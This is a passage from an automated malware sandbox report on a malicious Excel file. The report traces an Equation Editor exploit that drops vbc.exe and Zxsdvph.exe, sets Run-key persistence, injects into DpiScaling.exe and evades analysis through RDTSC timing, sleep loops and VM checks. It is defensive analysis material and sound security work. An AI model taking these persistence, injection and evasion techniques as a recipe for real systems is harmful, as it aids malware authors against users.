Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0262DBDA 7_2_0262DBDA
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0264CBA4 7_2_0264CBA4
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025AC85C 7_2_025AC85C
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025C286D 7_2_025C286D
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0263F8EE 7_2_0263F8EE
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_02625955 7_2_02625955
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025B69FE 7_2_025B69FE
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025A29B2 7_2_025A29B2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0264098E 7_2_0264098E
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025BEE4C 7_2_025BEE4C
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025D2E2F 7_2_025D2E2F
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025CDF7C 7_2_025CDF7C
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025B0F3F 7_2_025B0F3F
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00460A1C 9_2_00460A1C
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0043D6C0 9_2_0043D6C0
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0049F758 9_2_0049F758
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0045B7EC 9_2_0045B7EC
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: String function: 0260F970 appears 75 times
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: String function: 0259DF5C appears 108 times
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: String function: 0259E2A8 appears 33 times
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: String function: 025E3F92 appears 87 times
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: String function: 025E373B appears 213 times
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: String function: 004043D8 appears 71 times
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: String function: 00406B94 appears 61 times
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_72498690 NtReadFile, 7_2_72498690
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_72498710 NtClose, 7_2_72498710
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_724987C0 NtAllocateVirtualMemory, 7_2_724987C0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_724985E0 NtCreateFile, 7_2_724985E0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_724987C2 NtAllocateVirtualMemory, 7_2_724987C2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_02590048 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_02590048
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025900C4 NtCreateFile,LdrInitializeThunk, 7_2_025900C4
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025907AC NtCreateMutant,LdrInitializeThunk, 7_2_025907AC
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_0258FAD0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_0258FAE8
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_0258FB68
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_0258FBB8
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258F9F0 NtClose,LdrInitializeThunk, 7_2_0258F9F0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_0258FED0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0258FFB4
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0258FC60
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_0258FDC0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_02590078 NtResumeThread, 7_2_02590078
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_02590060 NtQuerySection, 7_2_02590060
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025910D0 NtOpenProcessToken, 7_2_025910D0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_02591148 NtOpenThread, 7_2_02591148
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0259010C NtOpenDirectoryObject, 7_2_0259010C
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_025901D4 NtSetValueKey, 7_2_025901D4
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FA50 NtEnumerateValueKey, 7_2_0258FA50
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FA20 NtQueryInformationFile, 7_2_0258FA20
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FAB8 NtQueryValueKey, 7_2_0258FAB8
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FB50 NtCreateKey, 7_2_0258FB50
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FBE8 NtQueryVirtualMemory, 7_2_0258FBE8
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258F8CC NtWaitForSingleObject, 7_2_0258F8CC
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258F900 NtReadFile, 7_2_0258F900
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258F938 NtWriteFile, 7_2_0258F938
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_02591930 NtSetContextThread, 7_2_02591930
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FE24 NtWriteVirtualMemory, 7_2_0258FE24
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FEA0 NtReadVirtualMemory, 7_2_0258FEA0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FF34 NtQueueApcThread, 7_2_0258FF34
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FFFC NtCreateProcessEx, 7_2_0258FFFC
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FC48 NtSetInformationFile, 7_2_0258FC48
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_02590C40 NtGetContextThread, 7_2_02590C40
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FC30 NtOpenProcess, 7_2_0258FC30
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0258FC90 NtUnmapViewOfSection, 7_2_0258FC90
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00466610 NtdllDefWindowProc_A, 9_2_00466610
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0044AFA4 NtdllDefWindowProc_A,GetCapture, 9_2_0044AFA4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00466DB4 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 9_2_00466DB4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00466E64 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 9_2_00466E64
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0045B7EC GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 9_2_0045B7EC
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0043D9D0 NtdllDefWindowProc_A, 9_2_0043D9D0
PE file contains executable resources (Code or Archives)
Source: vbc.exe.2.dr Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: vbc[1].exe.2.dr Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: Zxsdvph.exe.4.dr Static PE information: Resource name: RT_STRING type: COM executable for DOS
PE file contains strange resources
Source: vbc.exe.2.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: vbc[1].exe.2.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Zxsdvph.exe.4.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\Public\vbc.exe Section loaded: msmpcom.dll Jump to behavior
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Section loaded: msmpcom.dll Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 72480000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 72480000 page no access Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 72480000 page read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 72481000 page read and write Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe 'C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe 'C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Swift.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF028.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@8/21@6/1
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_004709EC CoCreateInstance, 9_2_004709EC
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0049FF2C EntryPoint,GetDiskFreeSpaceExA, 9_2_0049FF2C
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0042982C GetLastError,FormatMessageA, 9_2_0042982C
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0041C244 FindResourceA, 9_2_0041C244
Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\Public\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: DpiScaling.exe

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_7249A3BA pushfd ; ret 7_2_7249A3BB
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_7249B83B push eax; ret 7_2_7249B8A2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_7249B832 push eax; ret 7_2_7249B838
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_7249B89C push eax; ret 7_2_7249B8A2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_72486907 push 00000060h; retf 7_2_7248691C
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_7249A11B push ecx; ret 7_2_7249A11C
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_72499E43 push 0000007Eh; iretd 7_2_72499E45
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_7248EFC6 push cs; ret 7_2_7248EFCC
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_7249B7E5 push eax; ret 7_2_7249B838
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_724954EE pushad ; retf 7_2_724954F0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_0259DFA1 push ecx; ret 7_2_0259DFB4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00452658 push 004526E5h; ret 9_2_004526DD
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0046A054 push ecx; mov dword ptr [esp], ecx 9_2_0046A059
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00434010 push 0043405Ch; ret 9_2_00434054
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_004540CC push 004540F8h; ret 9_2_004540F0
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0047208C push 004720B8h; ret 9_2_004720B0
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0041A0AC push eax; iretd 9_2_0041A0AD
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0041A19C push eax; iretd 9_2_0041A19D
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00426248 push 004262F3h; ret 9_2_004262EB
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0041A250 push eax; iretd 9_2_0041A251
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0047223C push ecx; mov dword ptr [esp], edx 9_2_00472241
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0048C2F0 push 0048C31Ch; ret 9_2_0048C314
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_004262F8 push 00426388h; ret 9_2_00426380
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0045C2A4 push 0045C30Fh; ret 9_2_0045C307
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_004402A0 push 004402F9h; ret 9_2_004402F1
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0041A34C push eax; iretd 9_2_0041A3DD
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0044033C push 00440374h; ret 9_2_0044036C
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_004403D0 push 004403FCh; ret 9_2_004403F4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0043C3EC push 0043C418h; ret 9_2_0043C410
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00416450 push ecx; mov dword ptr [esp], eax 9_2_00416453
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0043C45C push 0043C488h; ret 9_2_0043C480
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0045200C SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode, 9_2_0045200C

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Zxsdvph Jump to behavior
Source: C:\Users\Public\vbc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Zxsdvph Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Stores large binary data to the registry
Source: C:\Users\Public\vbc.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00466698 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 9_2_00466698
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0044C6C8 IsIconic,GetCapture, 9_2_0044C6C8
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00466DB4 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 9_2_00466DB4
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00466E64 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 9_2_00466E64
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0044CF7C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 9_2_0044CF7C
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_004635DC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 9_2_004635DC
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0044D8A0 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 9_2_0044D8A0
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0042FFC4 IsIconic,GetWindowPlacement,GetWindowRect, 9_2_0042FFC4
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0045200C SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode, 9_2_0045200C
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\DpiScaling.exe RDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\DpiScaling.exe RDTSC instruction interceptor: First address: 000000007248899E second address: 00000000724889A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_004412A8 9_2_004412A8
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1580 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1256 Thread sleep time: -300000s >= -30000s Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 7_2_724888D0 rdtsc 7_2_724888D0
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 9_2_00465B98
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_004412A8 9_2_004412A8
Source: C:\Windows\SysWOW64\DpiScaling.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00429DC8 GetSystemInfo, 9_2_00429DC8
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00409218 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 9_2_00409218
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_00405AA4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 9_2_00405AA4
Source: explorer.exe, 00000008.00000000.688659406.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.688659406.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000008.00000000.646524780.000000000457A000.00000004.00000001.sdmp Binary or memory string: pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
Source: explorer.exe, 00000008.00000000.636828828.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000008.00000000.688904749.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe Code function: 9_2_0045200C SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode, 9_2_0045200C
Contains functionality for execution timing, often used to detect debuggers
